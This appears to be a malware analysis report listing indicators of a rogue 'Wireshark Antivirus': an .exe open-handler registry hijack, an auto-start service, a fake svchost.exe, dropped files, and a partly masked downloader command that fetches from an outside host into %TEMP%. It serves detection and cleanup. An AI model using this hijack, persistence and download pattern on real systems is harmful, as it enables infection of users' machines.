Техническая информация
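- [<HKLM>\SOFTWARE\Classes\exefile\shell\open\command] '' = '%PROGRAM_FILES%\alggui.exe "%1" %*' (this is the default value of the .exe open handler, so every program launch is routed through alggui.exe; during cleanup restore the value to the Windows default '"%1" %*' before deleting alggui.exe, otherwise executables will no longer start)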
- [<HKLM>\SYSTEM\ControlSet001\Services\AdbUpd] 'Start' = '00000002' (Start = 2 marks the AdbUpd service as auto-start, i.e. it persists across reboots)
- '%TEMP%\win2.tmp' "http://co######.boxingshool.com/stat/action3.cgi?p=###########################################################" "%TEMP%\win1.tmp" 1
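- '%PROGRAM_FILES%\svchost.exe' (the genuine svchost.exe resides in %WINDIR%\System32; a process of that name running from %PROGRAM_FILES% is a path anomaly worth alerting on)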
- '%PROGRAM_FILES%\Wireshark Antivirus\Wireshark Antivirus.exe'
- %PROGRAM_FILES%\adc_w32.dll
- %PROGRAM_FILES%\wp3.dat
- %PROGRAM_FILES%\alggui.exe
- %PROGRAM_FILES%\nuar.old
- %TEMP%\win2.tmp
- %HOMEPATH%\Start Menu\Programs\Wireshark Antivirus\Wireshark Antivirus.lnk
- %PROGRAM_FILES%\Wireshark Antivirus\Wireshark Antivirus.exe
- %HOMEPATH%\Desktop\Wireshark Antivirus.lnk
- %PROGRAM_FILES%\wp4.dat
- %PROGRAM_FILES%\svchost.exe
- 'localhost':1040
- 'localhost':1046
- 'ti##.#indows.com':123
- '25#.#55.255.255':0
- DNS ASK nt##.sp.se
- DNS ASK nt#.##.strath.ac.uk
- DNS ASK to##.#sno.navy.mil
- DNS ASK to##.#tdtime.gov.tw
- DNS ASK ti##.#tdtime.gov.tw
- DNS ASK ti###.stupi.se
- DNS ASK ti##.nist.gov
- DNS ASK ti##.#indows.com
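- DNS ASK co######.boxingshool.com (the same host appears in the URL passed to win2.tmp above; the other queried names appear to be public time servers, consistent with the port 123 connection, and are weak indicators on their own)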
- DNS ASK nt##.#bg.netnod.se
- DNS ASK nt##.#s.wisc.edu
- 'localhost':1038
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'